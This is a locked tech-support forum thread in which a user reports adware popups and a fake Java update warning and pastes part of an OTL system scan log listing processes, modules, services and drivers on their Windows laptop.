Jump to content

Welcome to Geeks to Go - Register now for FREE

Geeks To Go is a helpful hub, where thousands of volunteer geeks quickly serve friendly answers and support. Check out the forums and get free advice from the experts. Register now to gain access to all of our features, it's FREE and only takes one minute. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile and so much more.

Create Account How it Works
Photo

hundreds of popups ! Can barely use laptop! [Closed]


  • This topic is locked This topic is locked

#1
miszeewithkids!

miszeewithkids!

    Member

  • Member
  • PipPip
  • 35 posts

We are having major issues with our internet.  Some of the popups are PC Fix Speed, My PC Backup(?), programs from Crawler LLC, Client Connect LTD (?), and this constant Java error:  The page at https://zdmbwn.com says:  WARNING!!!  Your Java Version is Outdated, Have Security Risks, Please Update Now.  I am posting the OTL Log below.  Please help me!!

 

OTL logfile created on: 11/12/2014 12:49:37 PM - Run 1
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\Nick\Downloads
64bit- An unknown product  (Version = 6.2.9200) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17351)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
3.88 Gb Total Physical Memory | 1.64 Gb Available Physical Memory | 42.29% Memory free
4.76 Gb Paging File | 2.50 Gb Available in Paging File | 52.57% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 451.92 Gb Total Space | 387.86 Gb Free Space | 85.83% Space Free | Partition Type: NTFS
Drive Y: | 490.00 Mb Total Space | 202.39 Mb Free Space | 41.31% Space Free | Partition Type: NTFS
 
Computer Name: NICKS-PC | User Name: Nick | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Quick Scan | Include 64bit Scans
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - [2014/11/12 12:49:08 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Nick\Downloads\OTL.exe
PRC - [2014/10/22 19:25:19 | 001,514,040 | ---- | M] (Spotify Ltd) -- C:\Users\Nick\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe
PRC - [2014/09/12 04:43:06 | 000,064,704 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
PRC - [2014/07/14 17:21:46 | 001,390,176 | ---- | M] (Microsoft Corporation) -- C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
PRC - [2014/07/14 17:21:06 | 001,767,520 | ---- | M] (Microsoft Corporation) -- C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
PRC - [2013/08/27 16:57:32 | 000,248,208 | ---- | M] (TomTom) -- C:\Program Files (x86)\TomTom HOME 2\TomTomHOMERunner.exe
PRC - [2013/05/23 11:18:16 | 000,493,656 | ---- | M] (SoftThinks - Dell) -- C:\Program Files (x86)\Dell Backup and Recovery\Components\DBRUpdate\DBRUpd.exe
PRC - [2013/05/23 11:17:24 | 004,124,760 | ---- | M] (SoftThinks - Dell) -- C:\Program Files (x86)\Dell Backup and Recovery\Toaster.exe
PRC - [2013/05/23 11:17:06 | 001,915,480 | ---- | M] (SoftThinks SAS) -- C:\Program Files (x86)\Dell Backup and Recovery\SftService.exe
PRC - [2012/12/03 01:18:30 | 000,111,136 | ---- | M] (CyberLink) -- C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe
PRC - [2012/11/19 15:15:20 | 000,285,240 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
PRC - [2012/11/19 15:15:20 | 000,014,904 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
PRC - [2012/10/23 17:43:52 | 000,102,928 | ---- | M] (CyberLink Corp.) -- C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe
PRC - [2012/07/17 20:10:32 | 000,364,416 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
PRC - [2012/07/17 20:10:30 | 000,276,864 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
PRC - [2012/07/17 20:10:16 | 000,165,760 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
 
 
========== Modules (No Company Name) ==========
 
MOD - [2014/10/18 21:00:48 | 000,026,624 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\IAStorDataMcfeeca6f#\e8ad82cba0e31a5f24d1c14a6ff6088b\IAStorDataMgrSvcInterfaces.ni.dll
MOD - [2014/10/18 21:00:42 | 000,360,448 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\IAStorUtil\03697980fa6ae442d883e592d4ddafea\IAStorUtil.ni.dll
MOD - [2014/10/18 18:48:34 | 001,070,592 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522#\9c83f0e7098f709abd115e29c73e601e\System.ServiceModel.Web.ni.dll
MOD - [2014/10/18 18:48:31 | 002,964,480 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.IdentityModel\a027a5ca6358908b97b5085fb0464a36\System.IdentityModel.ni.dll
MOD - [2014/10/18 18:48:22 | 000,786,432 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626#\7159bb28e23de8ed898a2acb1dbfef6c\System.ServiceModel.Internals.ni.dll
MOD - [2014/10/18 18:48:22 | 000,118,272 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\SMDiagnostics\1c09d6db83322a23a1744d75c4836f85\SMDiagnostics.ni.dll
MOD - [2014/10/17 22:42:17 | 007,785,472 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Xml\43edd630a9f8cd6ac38c527b106ec94f\System.Xml.ni.dll
MOD - [2014/10/17 22:42:17 | 000,392,704 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq\9b0c1539963f393f6641949a67757b8f\System.Xml.Linq.ni.dll
MOD - [2014/10/17 22:42:10 | 001,874,432 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Xaml\6281ab590224520bad7c4f5b3ef37575\System.Xaml.ni.dll
MOD - [2014/10/17 22:42:08 | 012,856,832 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\70c6bf4a51d18b4a9a1805cd48d1caad\System.Windows.Forms.ni.dll
MOD - [2014/10/17 22:41:55 | 019,567,616 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.ServiceModel\055a9f703a30ece9cce1f6a130a296b5\System.ServiceModel.ni.dll
MOD - [2014/10/17 22:41:35 | 002,803,200 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\ab763e7f2c7532e9fe8f587995105156\System.Runtime.Serialization.ni.dll
MOD - [2014/10/17 22:41:31 | 001,169,920 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Management\8843bc51abc35b8247ffb506ef61d954\System.Management.ni.dll
MOD - [2014/10/17 22:41:31 | 000,522,752 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Net.Http\f13998cc28c6bb3c3138398e19c0d631\System.Net.Http.ni.dll
MOD - [2014/10/17 22:41:29 | 001,635,328 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Drawing\8efdc7a3726640f79d9333da88accaf8\System.Drawing.ni.dll
MOD - [2014/10/17 22:41:21 | 000,968,192 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Configuration\00fc7d14bbb38db00e4103912c041adf\System.Configuration.ni.dll
MOD - [2014/10/17 22:41:20 | 000,463,360 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca#\eb62bc6e97d1d2aafbf3a101d7f029e1\PresentationFramework.Aero2.ni.dll
MOD - [2014/10/17 22:41:18 | 018,744,320 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\377e9afc870e7d53922fbcfd6023b2f7\PresentationFramework.ni.dll
MOD - [2014/10/17 22:41:01 | 011,027,456 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\PresentationCore\a1799dc618cfa61adb75b82311884c3d\PresentationCore.ni.dll
MOD - [2014/10/17 22:40:50 | 003,957,760 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\WindowsBase\b8e2e79f70d09551560548cda72e2c51\WindowsBase.ni.dll
MOD - [2014/10/17 22:40:42 | 006,951,424 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Core\483443985708dc5439abe7fd6350abe4\System.Core.ni.dll
MOD - [2014/10/17 22:01:59 | 010,030,592 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System\1c5fe4cb68f67046baec4c3a854f722f\System.ni.dll
MOD - [2014/10/11 12:05:58 | 001,044,776 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
MOD - [2014/05/02 14:23:04 | 000,024,576 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\IAStorCommon\6b32db57e0a4d65caa47d67dfea865e8\IAStorCommon.ni.dll
MOD - [2014/02/12 21:58:32 | 000,073,544 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
MOD - [2014/01/27 06:52:41 | 017,395,376 | ---- | M] () -- C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\mscorlib\c90ef9a73ea0044641d31b19023aad61\mscorlib.ni.dll
MOD - [2013/05/02 19:01:12 | 001,813,792 | ---- | M] () -- C:\Program Files (x86)\Dell Backup and Recovery\OLCoreWrapper.dll
MOD - [2012/06/08 14:34:06 | 000,016,400 | ---- | M] () -- C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvcPS.dll
MOD - [2012/06/07 22:34:06 | 000,627,216 | ---- | M] () -- C:\Program Files (x86)\CyberLink\Power2Go8\CLMediaLibrary.dll
 
 
========== Services (SafeList) ==========
 
SRV:64bit: - [2014/09/11 11:02:10 | 000,111,616 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\SysNative\IEEtwCollector.exe -- (IEEtwCollectorService)
SRV:64bit: - [2014/08/15 22:29:38 | 002,899,968 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\spool\drivers\x64\3\PrintConfig.dll -- (PrintNotify)
SRV:64bit: - [2014/08/15 19:58:35 | 000,287,744 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\SystemEventsBrokerServer.dll -- (SystemEventsBroker)
SRV:64bit: - [2014/08/15 19:45:51 | 000,267,776 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\bisrv.dll -- (BrokerInfrastructure)
SRV:64bit: - [2014/07/24 02:28:58 | 001,600,000 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\workfolderssvc.dll -- (workfolderssvc)
SRV:64bit: - [2014/04/09 08:13:48 | 000,289,256 | ---- | M] (McAfee, Inc.) [On_Demand | Stopped] -- C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe -- (McComponentHostService)
SRV:64bit: - [2014/04/06 06:20:36 | 000,201,216 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\AudioEndpointBuilder.dll -- (AudioEndpointBuilder)
SRV:64bit: - [2014/03/23 21:31:14 | 000,347,880 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\NisSrv.exe -- (WdNisSvc)
SRV:64bit: - [2014/03/23 21:31:14 | 000,023,824 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\MsMpEng.exe -- (WinDefend)
SRV:64bit: - [2014/03/14 01:26:25 | 000,491,520 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\GeofenceMonitorService.dll -- (lfsvc)
SRV:64bit: - [2014/03/08 00:41:25 | 001,306,624 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\AppXDeploymentServer.dll -- (AppXSvc)
SRV:64bit: - [2014/03/06 02:02:13 | 000,834,560 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\netlogon.dll -- (Netlogon)
SRV:64bit: - [2014/02/22 10:53:10 | 003,394,384 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\WSService.dll -- (WSService)
SRV:64bit: - [2014/02/22 04:57:16 | 000,710,656 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\lsm.dll -- (LSM)
SRV:64bit: - [2014/02/22 04:26:58 | 000,366,080 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wcmsvc.dll -- (Wcmsvc)
SRV:64bit: - [2014/02/22 04:25:39 | 000,399,872 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\das.dll -- (DeviceAssociationService)
SRV:64bit: - [2014/02/22 04:23:58 | 001,576,960 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\wlidsvc.dll -- (wlidsvc)
SRV:64bit: - [2014/01/28 02:14:46 | 000,178,528 | ---- | M] (McAfee, Inc.) [Auto | Running] -- C:\Program Files\mcafee\msc\McAPExe.exe -- (McAPExe)
SRV:64bit: - [2014/01/27 09:37:08 | 000,185,792 | ---- | M] (McAfee, Inc.) [Auto | Running] -- C:\Windows\SysNative\mfevtps.exe -- (mfevtp)
SRV:64bit: - [2014/01/27 09:31:12 | 000,219,752 | ---- | M] () [Auto | Running] -- C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe -- (mfefire)
SRV:64bit: - [2014/01/21 04:04:28 | 001,025,712 | ---- | M] (McAfee, Inc.) [Auto | Running] -- C:\Program Files\Common Files\mcafee\AMCore\mcshield.exe -- (mfecore)
SRV:64bit: - [2013/12/10 02:35:18 | 000,530,944 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\AppReadiness.dll -- (AppReadiness)
SRV:64bit: - [2013/08/22 06:32:02 | 000,024,576 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wephostsvc.dll -- (WEPHOSTSVC)
SRV:64bit: - [2013/08/22 06:31:43 | 000,040,448 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\efssvc.dll -- (EFS)
SRV:64bit: - [2013/08/22 06:22:45 | 000,066,048 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wiarpc.dll -- (WiaRpc)
SRV:64bit: - [2013/08/22 06:21:15 | 000,013,312 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\svsvc.dll -- (svsvc)
SRV:64bit: - [2013/08/22 06:16:57 | 000,118,272 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\fhsvc.dll -- (fhsvc)
SRV:64bit: - [2013/08/22 05:25:28 | 000,164,352 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\NcaSvc.dll -- (NcaSvc)
SRV:64bit: - [2013/08/22 05:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicvss)
SRV:64bit: - [2013/08/22 05:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmictimesync)
SRV:64bit: - [2013/08/22 05:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicshutdown)
SRV:64bit: - [2013/08/22 05:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicrdv)
SRV:64bit: - [2013/08/22 05:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmickvpexchange)
SRV:64bit: - [2013/08/22 05:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicheartbeat)
SRV:64bit: - [2013/08/22 05:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicguestinterface)
SRV:64bit: - [2013/08/22 05:02:47 | 000,013,312 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\smphost.dll -- (smphost)
SRV:64bit: - [2013/08/22 04:57:25 | 000,130,560 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\ScDeviceEnum.dll -- (ScDeviceEnum)
SRV:64bit: - [2013/08/22 04:54:59 | 000,059,392 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\keyiso.dll -- (KeyIso)
SRV:64bit: - [2013/08/22 04:50:59 | 000,245,760 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\TimeBrokerServer.dll -- (TimeBroker)
SRV:64bit: - [2013/08/22 04:50:00 | 000,525,312 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\netprofmsvc.dll -- (netprofm)
SRV:64bit: - [2013/08/22 04:45:59 | 000,151,040 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\ncbservice.dll -- (NcbService)
SRV:64bit: - [2013/08/22 04:40:49 | 000,248,832 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\vaultsvc.dll -- (VaultSvc)
SRV:64bit: - [2013/08/22 04:31:03 | 000,201,728 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\DeviceSetupManager.dll -- (DsmSvc)
SRV:64bit: - [2013/08/22 04:15:54 | 000,073,728 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\NcdAutoSetup.dll -- (NcdAutoSetup)
SRV:64bit: - [2013/08/02 18:52:58 | 000,602,944 | ---- | M] (McAfee, Inc.) [On_Demand | Stopped] -- C:\Program Files\mcafee\virusscan\mcods.exe -- (McODS)
SRV:64bit: - [2013/07/30 12:45:02 | 000,328,928 | ---- | M] (McAfee, Inc.) [Auto | Running] -- C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe -- (MSK80Service)
SRV:64bit: - [2013/07/30 12:45:02 | 000,328,928 | ---- | M] (McAfee, Inc.) [Auto | Running] -- C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe -- (McProxy)
SRV:64bit: - [2013/07/30 12:45:02 | 000,328,928 | ---- | M] (McAfee, Inc.) [Auto | Running] -- C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe -- (mcpltsvc)
SRV:64bit: - [2013/07/30 12:45:02 | 000,328,928 | ---- | M] (McAfee, Inc.) [Auto | Running] -- C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe -- (McOobeSv2)
SRV:64bit: - [2013/07/30 12:45:02 | 000,328,928 | ---- | M] (McAfee, Inc.) [Auto | Running] -- C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe -- (McNaiAnn)
SRV:64bit: - [2013/07/30 12:45:02 | 000,328,928 | ---- | M] (McAfee, Inc.) [Auto | Running] -- C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe -- (McMPFSvc)
SRV:64bit: - [2013/07/30 12:45:02 | 000,328,928 | ---- | M] (McAfee, Inc.) [Auto | Running] -- C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe -- (HomeNetSvc)
SRV:64bit: - [2013/06/18 22:18:38 | 000,246,488 | ---- | M] (Realtek Semiconductor) [Auto | Running] -- C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe -- (RtkAudioService)
SRV:64bit: - [2012/12/21 16:37:20 | 000,334,760 | ---- | M] (McAfee, Inc.) [On_Demand | Stopped] -- C:\Program Files\Common Files\mcafee\ActWiz\McAWFwk.exe -- (McAWFwk)
SRV:64bit: - [2012/04/20 17:16:12 | 000,635,104 | ---- | M] (Intel® Corporation) [Auto | Running] -- c:\Program Files\Intel\iCLS Client\HeciServer.exe -- (Intel®
SRV:64bit: - [2009/11/17 20:14:26 | 000,098,208 | ---- | M] (Andrea Electronics Corporation) [Auto | Running] -- C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe -- (AERTFilters)
SRV - [2014/11/12 09:18:13 | 000,492,496 | ---- | M] () [Auto | Running] -- C:/Program Files (x86)/ORBTR/orbiter.dll -- (Orbiter)
SRV - [2014/11/11 14:48:28 | 000,267,440 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2014/11/03 02:30:34 | 003,054,552 | ---- | M] (Client Connect LTD) [Auto | Running] -- C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe -- (CltMngSvc)
SRV - [2014/09/24 17:31:38 | 000,114,288 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2014/09/12 04:43:06 | 000,064,704 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2014/08/15 22:29:38 | 002,899,968 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\system32\spool\drivers\x64\3\PrintConfig.dll -- (PrintNotify)
SRV - [2014/07/14 17:21:46 | 001,390,176 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe -- (c2cautoupdatesvc)
SRV - [2014/07/14 17:21:06 | 001,767,520 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe -- (c2cpnrsvc)
SRV - [2014/04/28 12:24:57 | 000,177,136 | ---- | M] (Coupons.com Inc.) [Auto | Stopped] -- C:\Program Files (x86)\Coupons\CouponPrinterService.exe -- (CouponPrinterService)
SRV - [2014/04/03 19:21:48 | 000,315,008 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Program Files (x86)\Skype\Updater\Updater.exe -- (SkypeUpdate)
SRV - [2014/03/14 01:10:16 | 000,357,376 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\GeofenceMonitorService.dll -- (lfsvc)
SRV - [2013/12/21 01:02:54 | 000,279,000 | ---- | M] (Intel Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\IntelCpHeciSvc.exe -- (cphs)
SRV - [2013/08/27 16:57:34 | 000,093,072 | ---- | M] (TomTom) [Auto | Stopped] -- C:\Program Files (x86)\TomTom HOME 2\TomTomHOMEService.exe -- (TomTomHOMEService)
SRV - [2013/08/21 22:55:35 | 000,018,944 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\StorSvc.dll -- (StorSvc)
SRV - [2013/08/21 21:53:34 | 000,011,776 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\smphost.dll -- (smphost)
SRV - [2013/05/23 11:17:06 | 001,915,480 | ---- | M] (SoftThinks SAS) [Auto | Running] -- C:\Program Files (x86)\Dell Backup and Recovery\SftService.exe -- (SftService)
SRV - [2012/12/28 16:41:58 | 000,226,944 | ---- | M] (Qualcomm Atheros Commnucations) [Auto | Stopped] -- C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\AdminService.exe -- (AtherosSvc)
SRV - [2012/12/26 04:41:44 | 000,081,536 | ---- | M] (Atheros) [Auto | Stopped] -- C:\Program Files (x86)\Dell Wireless\Ath_WlanAgent.exe -- (ZAtheros Wlan Agent)
SRV - [2012/11/19 15:15:20 | 000,014,904 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe -- (IAStorDataMgrSvc)
SRV - [2012/07/17 20:10:32 | 000,364,416 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe -- (UNS)
SRV - [2012/07/17 20:10:30 | 000,276,864 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe -- (LMS)
SRV - [2012/07/17 20:10:16 | 000,165,760 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe -- (jhi_service)
 
 
========== Driver Services (SafeList) ==========
 
DRV:64bit: - [2014/08/15 22:35:00 | 000,054,784 | ---- | M] (Apple, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\usbaapl64.sys -- (USBAAPL64)
DRV:64bit: - [2014/08/14 19:36:55 | 000,146,752 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\msgpioclx.sys -- (GPIOClx0101)
DRV:64bit: - [2014/07/24 10:28:38 | 000,468,288 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\USBHUB3.SYS -- (USBHUB3)
DRV:64bit: - [2014/07/24 10:28:38 | 000,412,992 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\spaceport.sys -- (spaceport)
DRV:64bit: - [2014/07/24 06:42:22 | 000,126,464 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\NdisImPlatform.sys -- (NdisImPlatform)
DRV:64bit: - [2014/05/13 08:21:18 | 000,035,440 | ---- | M] (Visicom Media Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mcaudrv_x64.sys -- (mcaudrv_simple)
DRV:64bit: - [2014/05/13 07:55:50 | 000,049,776 | ---- | M] (Visicom Media Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mcvidrv.sys -- (ManyCam)
DRV:64bit: - [2014/05/01 08:31:39 | 000,055,328 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\wpcfltr.sys -- (wpcfltr)
DRV:64bit: - [2014/03/23 21:30:57 | 000,257,880 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WdFilter.sys -- (WdFilter)
DRV:64bit: - [2014/03/23 21:30:57 | 000,123,224 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WdNisDrv.sys -- (WdNisDrv)
DRV:64bit: - [2014/03/23 21:27:03 | 000,035,856 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WdBoot.sys -- (WdBoot)
DRV:64bit: - [2014/03/19 22:41:20 | 000,376,152 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\clfs.sys -- (CLFS)
DRV:64bit: - [2014/03/13 07:35:24 | 000,157,016 | ---- | M] (Microsoft Corporation) [File_System | Boot | Running] -- C:\WINDOWS\SysNative\drivers\wof.sys -- (Wof)
DRV:64bit: - [2014/03/08 15:40:16 | 000,136,024 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\wfplwfs.sys -- (WFPLWFS)
DRV:64bit: - [2014/02/22 11:00:25 | 000,236,888 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\sdbus.sys -- (sdbus)
DRV:64bit: - [2014/02/22 10:49:51 | 000,325,464 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\USBXHCI.SYS -- (USBXHCI)
DRV:64bit: - [2014/02/22 10:49:49 | 000,189,784 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\UCX01000.SYS -- (UCX01000)
DRV:64bit: - [2014/02/22 10:49:49 | 000,079,192 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\sdstor.sys -- (sdstor)
